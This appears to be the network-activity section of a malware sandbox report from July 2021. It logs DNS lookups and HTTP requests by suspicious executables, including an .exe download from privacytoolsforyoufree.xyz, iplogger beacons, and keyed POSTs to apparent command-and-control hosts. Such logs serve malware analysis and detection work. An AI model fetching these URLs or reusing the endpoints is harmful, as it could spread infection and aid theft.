                                                                                          ip-api.com
                                                                                          IN A
                                                                                          Response
                                                                                          ip-api.com
                                                                                          IN A
                                                                                          208.95.112.1
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/ HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: ip-api.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:47 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 323
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 60
                                                                                          X-Rl: 44
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          fb.xiaomishop.me
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          fb.xiaomishop.me
                                                                                          IN A
                                                                                          Response
                                                                                          fb.xiaomishop.me
                                                                                          IN A
                                                                                          104.18.9.171
                                                                                          fb.xiaomishop.me
                                                                                          IN A
                                                                                          104.18.8.171
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://fb.xiaomishop.me/channel?md5=ecf845a9c953066463e27617c587896c
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          104.18.9.171:443
                                                                                          Request
                                                                                          GET /channel?md5=ecf845a9c953066463e27617c587896c HTTP/1.1
                                                                                          Host: fb.xiaomishop.me
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:49 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Set-Cookie: PHPSESSID=15905f97c5875a4876fa6dbc02759866; path=/
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c531894b981e99-AMS
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.bandersajtebrauch.club
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.bandersajtebrauch.club
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://g-partners.live/installer.php?pub=one
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          176.113.115.136:80
                                                                                          Request
                                                                                          GET /installer.php?pub=one HTTP/1.1
                                                                                          Host: g-partners.live
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:49 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.facebook.com
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.facebook.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.facebook.com
                                                                                          IN CNAME
                                                                                          star-mini.c10r.facebook.com
                                                                                          star-mini.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.36
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.facebook.com/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          31.13.83.36:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: Y12Y/8Eh9BKjDMhyNrWZlTCKzOzuRyfYUbl/NvrvKw5DO8Pc/DoOm2487cI/vQ1JizIwHT/mAaDI4CTqMFSccQ==
                                                                                          Date: Fri, 09 Jul 2021 23:04:50 GMT
                                                                                          Priority: u=3,i
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.facebook.com/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          31.13.83.36:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: g/iCPBKGX++VSPw5cHfc1OK8exleSrXjXUykveARFEcbutKK1uyGprRl2tOdHnXMFCCZOuN13V28Bpw08sTpxg==
                                                                                          Date: Fri, 09 Jul 2021 23:04:58 GMT
                                                                                          Priority: u=3,i
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/1zHzt7
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /1zHzt7 HTTP/1.1
                                                                                          Host: iplogger.org
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:51 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=ri1tnrpm73571gb0g190acdph6; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253176300; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          privacytoolsforyoufree.xyz
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          privacytoolsforyoufree.xyz
                                                                                          IN A
                                                                                          Response
                                                                                          privacytoolsforyoufree.xyz
                                                                                          IN A
                                                                                          82.118.23.111
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://privacytoolsforyoufree.xyz/downloads/toolspab1.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /downloads/toolspab1.exe HTTP/1.1
                                                                                          Host: privacytoolsforyoufree.xyz
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:51 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 291840
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:04:02 GMT
                                                                                          ETag: "47400-5c6b8c99a3836"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          1privacytoolsforyou.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          1privacytoolsforyou.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.profitabletrustednetwork.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          192.243.59.13
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          192.243.59.20
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          192.243.59.12
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          google.vrthcobj.com
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          google.vrthcobj.com
                                                                                          IN A
                                                                                          Response
                                                                                          google.vrthcobj.com
                                                                                          IN A
                                                                                          34.97.69.225
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          google.vrthcobj.com
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          google.vrthcobj.com
                                                                                          IN AAAA
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          uyg5wye.2ihsfa.com
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          uyg5wye.2ihsfa.com
                                                                                          IN A
                                                                                          Response
                                                                                          uyg5wye.2ihsfa.com
                                                                                          IN A
                                                                                          88.218.92.148
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          GET /api/fbtime HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=71657&key=a7eb4c09b8719e178840dd510bc96bef
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          POST /api/?sid=71657&key=a7eb4c09b8719e178840dd510bc96bef HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Content-Length: 266
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/18hh57
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /18hh57 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: iplogger.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:03 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=da889t3kd8cnrgrlutemr5qm96; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253176288; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.in-addr.arpa
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.in-addr.arpa
                                                                                          IN PTR
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:05:09 GMT
                                                                                          content-type: text/html
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: u_pl=14575867; expires=Sat, 10 Jul 2021 23:05:09 GMT
                                                                                          set-cookie: ain=eyJhbGciOiJIUzI1NiJ9.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.552cZvC5zY6d-ELysi_3P64nQ7K_aGqASdomAgVqgg0; expires=Fri, 09 Jul 2021 23:06:09 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: 6bf4bce6d2ba84358bbf9b56bdeed49c
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/e2q8zu9hu?shu=bdc0ee2b42df6a97b79289b43dabf78da95a8f3010db942836733be8431557d718899f20e5e280080874dd59123173fe409ccc6324d622d7826adc3fd96bc9422a6f1b45847aa68d8ba4a95fe2500b86979bc98e&pst=1625871969&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /e2q8zu9hu?shu=bdc0ee2b42df6a97b79289b43dabf78da95a8f3010db942836733be8431557d718899f20e5e280080874dd59123173fe409ccc6324d622d7826adc3fd96bc9422a6f1b45847aa68d8ba4a95fe2500b86979bc98e&pst=1625871969&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          cookie: u_pl=14575867; cjs=t
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:05:13 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 0
                                                                                          location: https://trk.lemon-ade.site/go/9f5655c8-33b8-4e91-aa0b-2e057393cf74?sub_id=8ed2aa71fe299be10cfbe1eb71ba5b38&source_id=14575867
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: iprc6f0dd3656f17b3f31db0b5655db4a19d=2860867; expires=Sat, 10 Jul 2021 00:05:13 GMT
                                                                                          set-cookie: pdhtkv=true; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          set-cookie: uncs=1; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          set-cookie: pdhtkv28=true; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          set-cookie: uncs28=1; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: 6ab7677435604ca38ad871768fa0d681
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          x1.c.lencr.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          x1.c.lencr.org
                                                                                          IN A
                                                                                          Response
                                                                                          x1.c.lencr.org
                                                                                          IN CNAME
                                                                                          crl.root-x1.letsencrypt.org.edgekey.net
                                                                                          crl.root-x1.letsencrypt.org.edgekey.net
                                                                                          IN CNAME
                                                                                          e8652.dscx.akamaiedge.net
                                                                                          e8652.dscx.akamaiedge.net
                                                                                          IN A
                                                                                          104.73.131.204
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://x1.c.lencr.org/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.73.131.204:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: x1.c.lencr.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Content-Type: application/pkix-crl
                                                                                          Last-Modified: Fri, 04 Sep 2020 00:34:32 GMT
                                                                                          ETag: "5f518b98-2cd"
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Sat, 10 Jul 2021 00:05:08 GMT
                                                                                          Date: Fri, 09 Jul 2021 23:05:08 GMT
                                                                                          Content-Length: 717
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:11 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 36
                                                                                          X-Rl: 43
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:12 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 35
                                                                                          X-Rl: 42
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:13 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 34
                                                                                          X-Rl: 41
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 33
                                                                                          X-Rl: 40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iw.gamegame.info
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iw.gamegame.info
                                                                                          IN A
                                                                                          Response
                                                                                          iw.gamegame.info
                                                                                          IN A
                                                                                          104.21.21.221
                                                                                          iw.gamegame.info
                                                                                          IN A
                                                                                          172.67.200.215
                                                                                        • POST
                                                                                          http://iw.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
